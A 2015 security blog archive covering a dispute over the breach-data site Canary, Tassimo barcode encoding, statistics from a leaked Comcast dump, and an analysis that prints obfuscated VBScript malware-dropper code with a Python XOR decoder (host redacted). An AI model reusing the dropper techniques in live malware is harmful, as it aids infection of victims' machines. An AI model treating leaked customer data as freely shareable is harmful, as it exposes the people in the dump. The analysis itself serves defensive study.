Tuesday, 1 December 2015

Internet Identity, Threat Intelligence, and a need for cooperation

As I wrote a few weeks ago, a company called Internet Identity, based out of Tacoma, WA, decided to engage with me by requesting that information be taken down from Canary. I had considered the matter dropped after writing that entry, but it appears I hit a nerve with someone at their organization, as I received a rather patronizing e-mail earlier today:

Subject: Canary.pw - Credential Gathering and Public Distribution
Date: 2015-12-01 8:52
From: Chris Sills <chris.sills@mail.internetidentity.com>
To: Colin Keigher <colin@keigher.ca>

Hello Colin,

My name is Christopher Sills and I’m an Operations Manager over at IID
and I wanted to reach out to you and discuss the various ways your data
from Canary.pw could be abused.

I fully understand that you’re attempting to create some form of 0-day
search engine for compromised credentials and ideally you would want
major corporations signed up for your platform and attempting to recover
data leaked in dumps you present, however, even that doesn’t do much
to protect the innocent users compromised in your data.

Your service, Canary.pw, can be used as a storefront for distributing
stolen credentials. The only thing a criminal would have to do is submit
samples of their stolen credentials to you, wait for you to host them
and then point prospective buyers to you so they may verify.

Your service also contains many lists of e-mail addresses scraped from
various sources that have likely been used at one time or another as
spam lists. Canary.pw makes aggregating that data less costly and more
efficient in regards to volume of valid e-mail addresses likely still in
use and ready for more attacks.

Additionally, anyone can search for employees of major corporations who
have had accounts using their corporate e-mail address as the username
compromised. The information in your data could then be used to either
blackmail those people or obtain legitimate credentials to corporate
resources (It may be bad security practice, but not everyone uses a
unique password for each unique login).

We (IID) have noticed that leaked data pertaining to our clients is
available within your platform and we would like for you to abandon your
current model of public availability. We would feel significantly
different about your Canary service if you forced all users to have an
account in order to get data and had some form of vetting process to
ensure only Threat Intelligence Services or Professionals had access. We
believe what you’re doing is irresponsible and may cause more problems
than it solves.
If you really want to help the community at large I recommend you reach
out to the NCFTA to discuss their Internet Fraud Alert program
(https://www.ncfta.net/internet-fraud-alert.aspx) or the Canadian Cyber
Incident Response Centre (CCIRC).
Both have a vetted clearinghouse for compromised credentials and will
distribute found credentials back to the involved parties. Something you
don’t seem to readily do at this time.

If you require any assistance with my recommendations please let me know
and I’ll see what I can do to help put you in contact with someone we

Thank you,

Shift Manager of Service Operations
IID _Security Central_

I don't care to respond to this unnecessary e-mail directly because it's going to work out as effectively as me yelling at my radio when a Tory comes on the air to speak their opinion about some socio-economic matter. Instead I am going to point out what is wrong in Chris' and Internet Identity's position on this matter.

Mr. Sills opens by completely misunderstanding the purpose of Canary, incorrectly assuming that it's a "zero-day" service and that I built it with the intention of having corporations use the platform. First, I am not sure where "zero-day" comes into play, but considering that many security firms like to latch on to such terms (including "APT"), it should come as no surprise that it gets dropped inappropriately. Second, Canary is intended to be multi-purpose: it's both a research tool for correlating breaches and a tool for determining whether or not a person or organization has been compromised.

He then tries to place me in the same bed as the attackers, which is both inappropriate and erroneous. For one thing, the data stored on the site is not readily indexable by search engines, as by design you cannot simply increment an identifier to grab everything from Canary. Additionally, I do keep track of searches (so no, you're not really anonymous when using it), and I would notice if someone started to bombard the server with far too many requests. Really, the work required to fully scrape all of the data from Canary would be better spent just replicating everything I did.

What Chris and IID are failing to understand is this: the barn doors have already been opened, and their fix is closing them after the horses have long since escaped. If the concern is that the data is now available for everyone to see and they're looking to protect their clients, the solution is not to police the information off of the Internet; instead, they need to tell their clients to change their passwords and make them aware of the risks going forward. Trying to get the Internet to forget things simply does not work.

If we're going to protect users on the Internet, we need to come up with more open systems to alert everyone to what is going on. It simply won't work to contact each user individually, so there needs to be a system in place that anyone can subscribe to. I'll elaborate on what I mean a bit later.

Infuriatingly, they suggest that I should stop allowing anyone to access the data, institute some "vetting process", and put all data behind a wall. I guess that since I called out their seemingly shady business practices, it was only fair for IID to talk down to me further and tell me how to operate my service.

This suggestion that I build what is effectively a "walled garden" makes absolutely no sense because I am sourcing the data from services that require no such access to begin with. As I've already pointed out, any person can go on to the sites that I monitor and again start taking the data for themselves and do as they please. Is IID going after other services that publish data it doesn't like to see?

On that note, how should I go about vetting people? Besides routinely removing accounts that use untrustworthy e-mail services or banning those who abuse Canary, I simply cannot determine who's a security or IT professional just by asking them to register. It's time-consuming and will do absolutely nothing to prevent whatever problem IID is conjuring.

Of course, when his company is charging money for access to the same data that I am providing, it should come as no surprise that this is the narrative they wish to take, considering that my model is a threat to theirs.

While I cannot speak for IID's prices, I've had other threat intelligence services request over $150,000 USD for a year's worth of services for what appeared to be just a glorified list of IP addresses sent to us at regular intervals. Given that they cited Chase Bank as a client in the original complaint, I can only imagine how much that relationship is worth to them and how much they likely charge their other customers. So when I or anyone else comes along offering a service that effectively undercuts them, I cannot say I am surprised to get this sort of reaction.

And it should be apparent that I am indeed a competitor. Here's an article from Reuters, published this past September, where they announced their product "Rapid Insight" (now renamed "Dossier"), which seems to do some pretty familiar things:
IID, the source for clear cyberthreat intelligence, today announced the launch of a new threat indicator research tool, Rapid Insight. IID's Rapid Insight allows threat analysts and other security professionals to simultaneously search a dozen or more sources in one place for contextual information about questionable domains, hostnames, URLs, IP addresses, email addresses and more -- providing faster and more accurate responses to cyberthreats.
Rapid Insight allows researchers to simply paste a suspicious threat indicator into the search field found in the Rapid Insight search section of ActiveTrust, IID's big data solution for Internet security. These search strings may be in the form of a domain, hostname, URL, IP address, email address, MD5, SHA1 or SHA256. Rapid Insight checks that information against intelligence found in over a dozen sources, including: Alexa, DNS Lookup, IP Geolocation, Google Custom Search, Google Safe Browsing, IID ActiveTrust, Passive DNS, Reverse DNS, Reverse WHOIS via DomainTools, Virus Total and WHOIS via DomainTools. More sources are scheduled to be added in the near future. 
And this is the problem that companies like IID present to cyber security as a whole: they make their products grotesquely expensive for what is really just information they sniffed out on the Internet, no differently than, say, myself, Troy Hunt, and others. Canary does all of the things "Dossier" does and has an open API, but IID is threatened by it because it offers what they sell for free.

One of the things I am interested in doing, and have been discussing in closed circles, is forming a working group to deal with breaches and other related data. There are many of us out there who have an interest in approaching this from a sane point of view, and in doing it in a manner that doesn't require participants to pay an arm and a leg.

Data breach details should be available in a fashion similar to an RBL (real-time blackhole list). Companies like Google and Facebook do keep track of the same data that I do, but for good reason focus only on their own users. Individuals, small businesses, and NGOs have very few options, and forking out six-figure sums to companies is not going to work.
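To sketch the RBL comparison: a breach-notification zone could work the same way, with a subscriber hashing an identifier and querying it as a DNS label. Everything below is hypothetical (the zone name, the choice of SHA-1); it is only meant to illustrate the subscription model, not describe a real service:

```python
import hashlib

def breach_query_name(email, zone="breach.example.org"):
    """Build an RBL-style DNS query name for a hypothetical breach zone.

    Hashing the address means the zone operator never publishes raw
    e-mail addresses, only digests that subscribers can look up.
    """
    digest = hashlib.sha1(email.strip().lower().encode("utf-8")).hexdigest()
    return "{0}.{1}".format(digest, zone)

# A subscriber would resolve this name; NXDOMAIN would mean
# "not seen in a known dump".
print(breach_query_name("user@example.com"))
```

The normalization (strip and lowercase) matters so that the same address always produces the same label, just as RBLs rely on a canonical reversed-IP form.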

If you're interested in helping me form this idea, please let me know.

Sunday, 29 November 2015

Tassimo T-Disc Barcode Encoding

One of the things I happen to own is a Tassimo coffee machine. It's pretty good compared to a Keurig because it allows for the use of syrup and milk. I do have to admit, however, that from an environmental standpoint it's pretty awful. If you're using one, I recommend looking into recycling the pods, although in Canada it appears that TerraCycle has stated they're no longer accepting them for their programme.

Something I was curious about years back was the barcode system and how it worked. I was able to find a page that contained details, but it has since been removed from the Internet and is only available via the Internet Archive. Because I'd like to keep this information readily available and searchable, I've gone ahead and copied down the details written by the original author.

So going forward none of this is my own, original writing but has been mirrored here for future reference.


What sets the Tassimo apart from similar single-serve machines on the market is the encoding of the brewing parameters for beverages on the surface of the pod (T-DISC) using a barcode that has been encoded using the Interleaved 2 of 5 symbology.

On this page, you will find information related to investigating the correlation between the barcodes on the T-DISCs and the operation parameters for the Tassimo.

Operation Parameters

There are five parameters that comprise a typical Tassimo beverage brewing cycle:

  1. Water Temperature
    • This parameter sets the temperature for the internal boiler prior to brewing.
  2. Cartridge Charge
    • This parameter controls how much water is used and how long the T-DISC contents are pre-soaked prior to brewing.
  3. Beverage Volume
    • This parameter controls the amount of water dispensed for the beverage - depending on the type of beverage, material in the pod, etc. the actual dispensed volume will vary.
  4. Flow Rate
    • This parameter controls the flow of water through the T-DISC during brewing, measured as a percentage.
  5. Purge
    • This parameter controls the final phase of the brew cycle which is used to evacuate or flush the T-DISC. This may be short or long depending on the type of beverage.

Binary Coding

While not definitive, the Tassimo patent application suggests that the data encoded by the barcode can be broken down into 13 bits, which in turn directly control the operation parameters of the machine:

Parameter   Bits  Decimal  Setting
Water Temp  10    2        83C / 181F
            11    3        93C / 199F
Charge      00    0        fast charge w/ soak
            01    1        fast charge no soak
            10    2        slow charge w/ soak
            11    3        slow charge no soak
Purge       00    0        slow flow / short period
            01    1        slow flow / long period
            10    2        fast flow / short period
            11    3        fast flow / long period
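For what it's worth, the table above can be expressed as a simple lookup; the bit patterns come from the patent application and, as noted, are not definitive:

```python
# Speculative mapping from the Tassimo patent application; not verified
# against actual hardware.
WATER_TEMP = {
    "10": "83C / 181F",
    "11": "93C / 199F",
}
CHARGE = {
    "00": "fast charge w/ soak",
    "01": "fast charge no soak",
    "10": "slow charge w/ soak",
    "11": "slow charge no soak",
}
PURGE = {
    "00": "slow flow / short period",
    "01": "slow flow / long period",
    "10": "fast flow / short period",
    "11": "fast flow / long period",
}

print(WATER_TEMP["10"], CHARGE["11"], PURGE["01"])
```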

Decoding Barcodes

Initially, the symbology, and thus the encoding of the T-DISC programs, was uncovered through trial and error, beginning with a hacked :CueCat barcode reader used to scan the T-DISCs and determine the numbers behind them.

From this exercise, a list of six digit numbers was compiled and next used as input to a barcode generator to determine the symbology used for encoding.

By comparing generated barcodes with the corresponding T-DISC, it was discovered that Interleaved 2 of 5 symbology was being applied - a common standard.
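Interleaved 2 of 5 is simple enough to reproduce for this kind of comparison: each digit maps to five elements, two of them wide, and digits are taken in pairs with the first digit's pattern on the bars and the second's on the interleaved spaces. A sketch of generating the wide/narrow ('W'/'N') sequence for a code, which is essentially what the barcode generator in this exercise was doing:

```python
# Standard Interleaved 2 of 5 digit patterns: N = narrow, W = wide.
I2OF5 = {
    "0": "NNWWN", "1": "WNNNW", "2": "NWNNW", "3": "WWNNN", "4": "NNWNW",
    "5": "WNWNN", "6": "NWWNN", "7": "NNNWW", "8": "WNNWN", "9": "NWNWN",
}

def encode_i2of5(digits):
    """Return the bar/space wide-narrow sequence for an even-length digit string."""
    if len(digits) % 2:
        raise ValueError("Interleaved 2 of 5 needs an even number of digits")
    out = ["NNNN"]  # start pattern: narrow bar, space, bar, space
    for i in range(0, len(digits), 2):
        bars, spaces = I2OF5[digits[i]], I2OF5[digits[i + 1]]
        # Interleave: one bar element, then one space element, five times per pair.
        out.append("".join(b + s for b, s in zip(bars, spaces)))
    out.append("WNN")  # stop pattern: wide bar, narrow space, narrow bar
    return "".join(out)

print(encode_i2of5("123456"))
```

Rendering the resulting sequence as thick and thin bars/gaps and holding it next to a T-DISC is enough to confirm the symbology visually.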

Next, the codes were broken down into their binary equivalents to try and discern common patterns that may correspond to key parameters like volume of dispensed water.

Thursday, 26 November 2015

Comcast Breach by the Numbers

As was reported over the past few weeks, about 600,000 usernames and passwords for Comcast users were available for sale. I have come across the data since then and have decided to reveal some stats.

In the dump there were the following:
  • A CSV of e-mail addresses, customer names, and associated physical addresses (comcast_27k_emails_with_full_house_addresses.txt)
  • A CSV of usernames and passwords in plaintext (comcast_590K_users_with_plain_text_passwords.txt)
  • A SQL dump of a table containing account IDs, GUIDs, aforementioned usernames, account statuses, and passwords (comcast_vanity.sql)
Additionally, a text file containing the following:
hacked by orion, sold on Python Market 
software vuln allowed access to mail servers which contained user emails and plain text passwords lol, enjoy. Do not leak out this link or else i will....do fucking nothing. 
Update Monday November 9,2015: Comast is full of shit.txt
Total usercount (with passwords):  590,298
comcast claims to have reset all affected accounts..and yet many of them still work just fine, LOL!
yup this was totally from phishing, comcast boxes were totally never breached!

I haven't put these into Canary yet, but I have gone through the data for those who wish to know how people were affected. Based on the contents, I also believe that something belonging to Comcast (or a third party) was indeed breached, contrary to their official statement.

For the record, I did not purchase the data.

The Numbers

I tweeted this a few days ago, but here are the raw numbers:
  • 590,298 usernames/e-mail addresses and passwords were included in this breach
    • 413,964 unique passwords were found within the list
    • 296,907 of those passwords appear in rockyou.txt
  • 27,262 e-mail addresses, individuals' names, and physical addresses were exposed
  • 889,627 records were listed in the SQL dump
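The unique-password and rockyou.txt overlap counts above come from basic set arithmetic; a minimal sketch of the approach (the toy data below stands in for the real dump and wordlist files):

```python
def password_stats(dump_passwords, wordlist):
    """Count unique passwords in a dump and how many appear in a wordlist."""
    unique = set(dump_passwords)
    seen_before = unique & set(wordlist)
    return len(unique), len(seen_before)

# Toy data standing in for the real dump and rockyou.txt:
dump = ["hunter2", "letmein", "hunter2", "correcthorse"]
rockyou = ["letmein", "password", "hunter2"]
print(password_stats(dump, rockyou))  # (3, 2): 3 unique, 2 previously seen
```

For a 14.3-million-line wordlist, loading it into a set once keeps each membership check constant-time, which is what makes this tractable.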

What's in the SQL dump?

Interestingly, the SQL table has the following columns:

  • account_id
  • guid
  • vanityName
  • enabled
  • suspended
  • migration_status
  • migrated
  • migration_password
When Comcast denies that they suffered a breach while the attacker claims to have breached a mail server, you have to wonder what the truth is, given a SQL database that includes details like account IDs, account status, and something about a migration (to another system, maybe?). There are allegations that this data may have come from a third party, so perhaps there is some truth in all of this for Comcast, but what was the actual source?

I was curious how many actual customers were affected by this breach so I did two things: I looked for how many accounts were marked as "enabled" and then how many were marked as "suspended", plus a few extra things to see what was going on. 

Here's how it all broke down:

  • Of the 889,627 accounts listed in the dump, 851,093 accounts were marked as "enabled"
    • Only 7 of those accounts were marked as "suspended"
  • 889,555 of all accounts have been marked as "migrated"
  • The number of passwords in the password file matches the number of entries in this database where the password was not marked as null (590,298)
The numbers here make it quite clear that Comcast or a third party with access to the data suffered a breach.

Where are people affected the most?

In the 27,262 customer addresses and e-mails exposed, 5,994 unique ZIP codes were represented--there are about 43,000 across the whole United States. These were the top-ten ZIP codes that had customers affected:
  1. 80202 - Denver, CO (58 customers)
  2. 55303 - Anoka, MN (57 customers)
  3. 15601 - Greensburg, PA (54 customers)
  4. 37214 - Nashville, TN (52 customers)
  5. 17331 - Hanover, PA (47 customers)
  6. 26003 - Wheeling, WV (45 customers)
  7. 15301 and 46350 - Washington, PA and La Porte, IN (44 customers)
  8. 19464 and 21014 - Pottstown, PA and Bel Air, MD (42 customers)
  9. 77702 - Beaumont, TX (40 customers)
  10. 02703 and 17701 - Attleboro, MA and Williamsport, PA (37 customers)
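The ranking above is a straightforward frequency count over the ZIP column of the CSV; a sketch of the approach (the column name and toy rows are stand-ins for the real 27,262-record file):

```python
from collections import Counter

def top_zips(rows, n=10):
    """Rank ZIP codes by the number of affected customers."""
    return Counter(row["zip"] for row in rows).most_common(n)

# Toy rows standing in for the parsed customer CSV:
rows = [{"zip": "80202"}, {"zip": "80202"}, {"zip": "55303"}]
print(top_zips(rows))  # [('80202', 2), ('55303', 1)]
```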

Of those 27,262 customers, 3,256 of them had their passwords exposed in the password list--assuming that their e-mail addresses' local-parts can be correlated to the "vanityName" field.

I have created a map that will let you see who's affected. There are some weird quirks due to problems with ZIP codes not matching up with their respective cities, so keep that in mind.


As stated already, Comcast or a third-party was breached and this data was exposed. Comcast owes an explanation to its customers.

I'll be placing the e-mail addresses on Canary as soon as possible. 

Friday, 20 November 2015

Internet Identity and actually being effective with threat intelligence

A few weeks ago, I wrote about my problem with threat intelligence. It's the new hotness in the cyber security sector: instead of actually trying to fix problems, we have new companies emerging that do little more than scream that the sky is falling.

Last week, I received a curious e-mail from a company based outside of Seattle called "Internet Identity" or "IID": 
Subject: Requesting assistance: Fraud placed on canary.pw
Date: 2015-11-11 15:24
From: IID SIRT <alert@internetidentity.com>
To: support@canary.pw

Sir or Ma'am,

We are contacting you on behalf of our client Chase Bank to notify 
you that your website, canary.pw, has been compromised and a phishing 
page has been hidden in one or more of its directories.

I work with an Internet security company based in Washington State 
called Internet Identity, and am contracted by our client to assist 
in mitigating the attacks targeting their customers.

The files in question can be found at the following location:

canary [.] pw/view/?item=c1aa76c1226a80bdf050e0d7d14f1ff7

Should you have any questions or concerns, please call our 24/7 
Security Team at the phone number listed below. Simply reference 
the case number and any one of my colleagues will be able to help.

Thank you very much for your time.

Best regards,

Security Incident Response Team
I responded to them with a short, one-sentence e-mail asking if they had bothered to read the "About" page on the website; the e-mail sent to me clearly indicated that they were under the impression that I had somehow been breached myself. They then sent a clarification e-mail:
Subject: Stolen Credentials
Date: 2015-11-11 15:51
From: IID SIRT <alert@internetidentity.com>
To: support@canary.pw


We are working on behalf of Chase Bank in order to remove the stolen 
credentials at the following URL:



The credentials posted here have been fraudulently acquired and need 
to be removed as soon as possible.

Please take action to suspend this account or remove the offending 

Please let us know if you need any further information.  We greatly 
appreciate your prompt attention to this issue and request that you 
advise us regarding what actions you take.


Security Incident Response Team
To which I replied:
Subject: Re: Stolen Credentials
Date: 2015-11-11 15:57
From: Colin Keigher <colin@keigher.ca>
To: IID SIRT <alert@internetidentity.com>


You are contacting another threat intelligence service. Please read the 
"About" page (https://canary.pw/about/):

> Canary is an open-sourced project created for members of the security 
> community to share and distribute information relating to data loss. Data 
> is sourced from a variety of sources through community members. The goal 
> is to allow for researchers and organisations to better understand and 
> react to data loss.
> What is collected for this website are documents from various 
> document-sharing websites, Internet forums, and social media that may or may 
> not contain data that is not intended for the general public but otherwise 
> has. The intention is to allow individuals, organisations, and researchers to 
> be able to identify where exposed data is being posted and what history it 
> may or may not have with other leaks. The idea is to ensure data integrity 
> and to dispel any ambiguity about information that is out there.

Please contact the affected individuals in the dump that was posted to change 
their passwords as that is what makes most sense--do you not agree?

This information was retrieved from Pastebin in September 2015 and was not 
"frauduently acquired" by us. We monitor several websites for information that 
has been posted.

And then left it at that. There was no response or anything from them. The solution for this company's client was simple: change the password. The cat is already out of the bag, right? How are you going to put that genie back in the bottle?

But nope. It appears that IID is either run by completely inept individuals who don't grasp the concept of addressing actual threats, or they're attempting to look like they're worth the amount of money they charge their clients by harassing my hosting provider and telling them I am hosting "fraudulently acquired" material. They're not addressing any sort of "threat" by trying to scrub the Internet of anything: have they not heard of the "Streisand effect"?

Yes. The data was probably "fraudulently acquired" as someone probably breached some bankers' association website and then dumped the contents on Pastebin for all to see. My software picked up on it, put it up on Canary, and now it's there so we can track future breaches. For a company like IID, the concept of what I am doing should be pretty basic if they're going to make claims like this on their website:
Our Threat Intelligence team continuously validates and processes incoming data, adding classifications and attributes for context, and then pursuing organic intelligence that adds further value to the data. In collaboration with security researchers and experts around the world, our team can turn a whirlwind of incidental blips into a coherent, actionable assessment.

Whenever our investigators find a suspicious event, file or situation, they quickly validate and verify the symptom, identify and analyze malware and malicious campaigns, and conduct background reputation checks on any associated IP, domain and URL. The team can monitor Denial of Service attacks and provide intelligence to affected customer targets, or perform network forensics to identify compromised hosts throughout an organization using DNS log data.
Or maybe how they explain their acquisition of threat intelligence data through their service:
Security analysis depends on compiled and correlated emerging threat data to stay ahead, but investigating threat indicators has been a tedious manual process.

Dossier provides contextual information about a potential threat so you can make informed decisions about defensive actions. And it’s so fast and effective, you end up with lots more time to do your job.
So here's a question for IID: was it your organization that decided that a password posted on the Internet for everyone to see should be removed from wherever you find it to justify how much you charge your clients or was it your client that made the "informed decision" to then tell you to act as Internet police? Based on your Glassdoor reviews, I can safely assume the answer here.

Here's a pro-tip from someone who enjoys working with breach data and can actually provide "informed decisions" based on it: think your password has been exposed on the Internet for all to see? Change it, and don't get upset at seeing it posted elsewhere; instead, get pissed off at whoever led to your data being exposed in the first place.

IID demonstrates the problem with threat intelligence: justifying what you charge your clients. What good is a threat intelligence service if all they're going to do is let you keep your passwords as-is and then police the data off of the Internet? It doesn't work that way, and any service provider that tells you they can scrub all instances of specific data is outright lying.

For the hell of it, I decided to do something with the original data that they complained about.

In the sample, there were 6,147 accounts listed. Of those accounts, none of the passwords repeated, so we're off to a good start. How many of the passwords have existed in previous dumps? Well, if we use our good friend 'rockyou.txt', which contains about 14.3 million unique passwords from a database dump half a decade back, we can determine that 1,484 passwords (24%) had appeared in previous dumps.

Of those 6,147 accounts, 52 belonged to IID's client, Chase Bank--or about 1% of the total. If I take the list of Chase users and compare them to the passwords found in the dump, 24 of them had matches, meaning that almost half (46%) of the affected client's users were using passwords that have been found elsewhere.

This means that IID has completely idiotic policies for handling database breaches, making them more of a threat to their clients than the leaked data itself. They have no clue about breaches and are dealing with matters in a way that cannot scale at all.

As a result of the idiocy displayed by IID, I've gone about doing two things.

Firstly, the data has been reposted to Canary in redacted form, with the passwords replaced by their MD5 equivalents and a notice placed at the top of the sample indicating what has happened (this is policy going forward). If they take issue with the e-mail addresses being posted here, then IID is being outright malicious and is, in my opinion, looking to take out a potential competitor that does their work for free. IID is more than welcome to prove my opinion wrong, however.

Secondly, I am in the midst of migrating the site off of its current hosting provider and placing it elsewhere. I don't have time to waste dealing with inept companies that don't understand the data they're working with. IID had spent time on my website reading the contents and yet still opted to go down this avenue.

IID is no longer welcome to use Canary going forward. Should the company take exception to this, they're more than welcome to contact me.

Wednesday, 21 October 2015

Deobfuscating malware droppers written in VBScript

Once in a while I run across malware that drops itself via a macro embedded into a Microsoft Word DocX file, written in Visual Basic script. These payloads are fairly common and have been documented in a number of places. However, I noticed in one instance that the payload it was retrieving was encoded somehow with the macro doing the decoding.

If you're not sure what the document I am referring to looks like, here's a screenshot of what you should expect if you were to open it in Word or LibreOffice.

I've opted to not share the whole source code for the payload here but I am writing this as a primer for retrieving the data should you be interested in it. I've removed references to the keys and location of the payload but again this writeup should provide more than enough information.

It's pretty straightforward to decipher the URL so you can download the payload. The relevant code will look a lot like this:
IsDwQV = "httEeDxPbOZhstcWp://"
dlBSaKVPUZeUffK = Replace(IsDwQV, "EeDxPbOZhstcW", "")

vJPIYmKkzEidc = dlBSaKVPUZeUffK + "" + "file.da" + "t"
As we can see, the URL is really "" (redacted here, per the above), so all one has to do is retrieve it normally to have the payload. This isn't new for this type of attack; what is different here is that you'll need to look for an additional line that decodes the file. An example of what we're looking for:
PTIEIYzefrUBrv.Write auRPAIQxRBuNVNs(ZlOton(AsWLAJsjgp), "mal" + "wa" + "rek" + "ey")
Again, just as straightforward as earlier: we combine the string fragments in the second argument to form the key "malwarekey".

Now that we've figured out the payload's URL and the key, we'll want to see how the payload is decoded. It goes through two processes: the first reorders the contents of the file, and the second performs an XOR on each byte.

The XOR function looks a lot like this (keep in mind, the variable and function names will change to avoid detection, but the patterns will remain mostly the same; the missing Next and return assignment in the sample have been restored here):
Function auRPAIQxRBuNVNs(gZZoRIEiqkagc, CIKkGOaWM)
Dim vJPIYmKkzEidc
vJPIYmKkzEidc = ""
Dim yjiyoPGJqpm
yjiyoPGJqpm = 2 - 1
Dim RpKxIaBse
RpKxIaBse = 1
For RpKxIaBse = 1 To Len(gZZoRIEiqkagc)
PhnHyZVCyES = Mid(CIKkGOaWM, yjiyoPGJqpm, 1)
vJPIYmKkzEidc = vJPIYmKkzEidc & Chr(Asc(Mid(gZZoRIEiqkagc, RpKxIaBse, 1)) Xor Asc(PhnHyZVCyES))
yjiyoPGJqpm = yjiyoPGJqpm + 1
If Len(CIKkGOaWM) < yjiyoPGJqpm Then yjiyoPGJqpm = 1
Next
auRPAIQxRBuNVNs = vJPIYmKkzEidc
End Function
The reordering function then looks like this:
Function ZlOton(ODkdfygTwl)
Dim XvZDYBA, ZazVWW, SyyWJefcxs, eauVLHixkVU, cQdAHb, WGHeGPbgR
Dim myjfHUNidfOgtQ
XvZDYBA = 1
ZazVWW = (&H3EF + 2892 - &HF3A)
SyyWJefcxs = (&H3EF + 2892 - &HF3A)
myjfHUNidfOgtQ = LenB(ODkdfygTwl)
Do While XvZDYBA <= myjfHUNidfOgtQ
WGHeGPbgR = WGHeGPbgR & Chr(AscB(MidB(ODkdfygTwl, XvZDYBA, 1)))
XvZDYBA = XvZDYBA + 1
SyyWJefcxs = SyyWJefcxs + 1
If SyyWJefcxs > 300 Then
cQdAHb = cQdAHb & WGHeGPbgR
WGHeGPbgR = ""
SyyWJefcxs = (&H3EF + 2892 - &HF3A)
ZazVWW = ZazVWW + 1
If ZazVWW > 40 * (&H20 + 1142 - &H491) Then
eauVLHixkVU = eauVLHixkVU & cQdAHb
cQdAHb = ""
ZazVWW = 1
End If
End If
Loop
ZlOton = eauVLHixkVU & cQdAHb & WGHeGPbgR
End Function
The reorder function is easy to clean up, so I've gone ahead and written it like so:
Function reorder(filedata)
Dim var1, var2, var3, var4, var5, var6
var1 = 1
var2 = 1
var3 = 1
Do While var1 <= LenB(filedata)
var6 = var6 & Chr(AscB(MidB(filedata, var1, 1)))
var1 = var1 + 1
var3 = var3 + 1
If var3 > 300 Then
var5 = var5 & var6
var6 = ""
var3 = 1
var2 = var2 + 1
If var2 > 200 Then
var4 = var4 & var5
var5 = ""
var2 = 1
End If
End If
Loop
reorder = var4 & var5 & var6
End Function
Once we've cleaned this all up, we can determine that the function does absolutely nothing; it exists purely for further obfuscation. Data that goes through this function comes out unchanged, so it's really just a time-waster. However, the payload is still encoded, so I went ahead and cleaned up the second function as well:
Function decodexor(filedata, filekey)
Dim var1
var1 = ""
Dim var2
var2 = 2 - 1
Dim var3
var3 = 1
For var3 = 1 To Len(filedata)
var4 = Mid(filekey, var2, 1)
var1 = var1 & Chr(Asc(Mid(filedata, var3, 1)) Xor Asc(var4))
var2 = var2 + 1
If Len(filekey) < var2 Then var2 = 1
Next
decodexor = var1
End Function
Okay. So this code does in fact do something, and it tells us that it's a straightforward XOR of the data against a key. We can now just rewrite this script into Python line by line.

I've made it available via this Github Gist and per below:
from sys import argv

filename = argv[1]
malwarekey = argv[2]

def dexor(filedata, filekey):
    var1 = ''
    var2 = 0
    var4 = ''
    for x in xrange(0, len(filedata)):
        var4 = filekey[var2]
        var1 = var1 + chr(ord(filedata[x]) ^ ord(var4))
        var2 += 1
        if var2 >= len(filekey):
            var2 = 0
    return var1

if __name__ == '__main__':
    data = open(filename, 'rb').read()
    print dexor(filedata=data, filekey=malwarekey)
You'll note that this Python function is a fairly literal mirror copy of the original, but it works one-to-one with the VBScript; there are of course better ways to write this.
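For instance, a tighter Python 3 take on the same repeating-key XOR (my own sketch, not part of the original script) could look like this:

```python
from itertools import cycle

def dexor(data: bytes, key: bytes) -> bytes:
    # XOR every payload byte against the key, repeating the key as needed
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```

Because XOR is its own inverse, running the function twice with the same key returns the original data.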

Once happy, we can run it like so:
$ python dexor.py file.dat malwarekey > file.exe
$ file file.exe 
file.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Now we have the file decoded and can execute it within whatever sandbox we'd like!

Wednesday, 7 October 2015

An open response to Veiltower and Edsard Ravelli's Kickstarter update

An update was posted on the Veiltower Kickstarter earlier today. This was in response to the furor expressed by myself and many others on Twitter since yesterday morning. As a result of this response and as a follow up to my previous entry, I've opted to opine on the response.
Dear Backers,
Edsard here, developer of Veiltower. Our project has now been active on Kickstarter for over 24 hours. To say that it has been overwhelming is a major understatement.
On the one hand we’ve been receiving a lot of praise - particularly from friends, colleagues and business partners who know us - and on the other hand there has been criticism directed at our project from a few people in the information security community. 
The criticism was primarily directed at one thing; the ‘100% secure’ statement on our Kickstarter page. Information security officers will always tell you that nothing can be infinitely 100% secure. And that is true. But frankly this is, in my honest opinion, a theoretical debate. For instance ‘PGP’-encrypting technology for e-mail is great, but 99% of people on the planet don’t use it. Why? 

This isn't amateur hour: the fact that you tried to enter the cyber security space with what appears to be inadequate knowledge and research should be enough to warrant scorn and ridicule over the use of the term "100% secure".

Trying to also pass off praise from friends, colleagues, and business partners in face of this valid criticism is akin to a child receiving praise from their parent after having achieved a failing grade in school. The opinion of the parent is not going to change the outcome of the child's inability to perform.

The reason why information security professionals who are adept at their jobs frown upon "100% secure" statements is that it is impossible for such a thing to exist. If your device were even remotely capable of providing this, you wouldn't be selling it at $159 but for much, much more. By using that statement, you've put yourself in a league with many other failures who've made the same remark and were later found to be far from secure.

The problem with information security isn't a device or application problem: it's a human one. The human problem--or as I like to call it, the "Layer 8 Problem"--is the primary culprit behind breaches, malware infections, and scams. With infections and scams, users tend to fail to keep their machines up to date or do not take a critical look at what they're being presented with. You fail to understand this, yet have no problem stating that a simple VPN and "secure" access point is going to solve everything.

I am ignoring your PGP question because if you truly understood the problem you're facing you would have not asked that.
If you want to secure yourself as a tech-savvy person you would setup a solution in your home with a strong firewall, strong Wi-Fi encryption, and add into the mix a VPN both on your system at home as on all of your devices. You will configure and maintain them daily, spend the effort and remain vigilant at all the time. Simple. But most of you, and the majority of internet users, neither have the time or the experience to set this up, let alone maintain it. 
And that’s what the Veiltower concept is all about. It’s about combining existing and proven methods in a way that’s easy for ‘Average Joe’. The real threat to our security – as stands today – is the complexity of use and the lack of usability. We don’t use ‘PGP’ because it’s perceived as complex. 
The "real threat to our security" is not just the complexity of it or that humans make mistakes, it is also the fact that people like you try and sell half-baked solutions. I come across many, many products on a constant basis in my line of work where the vendors promise that it will do this with minimal cost on resources. For every one good security product out there, there are umpteen that are complete garbage and are backed by individuals like yourself. I rarely if ever endorse a product but I have no problem calling one "garbage" when I see it--and yours comes under that category.

When you go on Kickstarter claiming "100% secure" and then go on Twitter to claim that you're just stating this for the common layperson, you're being deceitful and demeaning. It doesn't matter if you're talking to an information security professional or a common user: you tell the truth. Making security easier for users is something that all of us should try to do, but we do it in a way that doesn't require us to talk down to them--like you are--and also doesn't involve manipulating them with outright lies--such as claiming "100% secure".

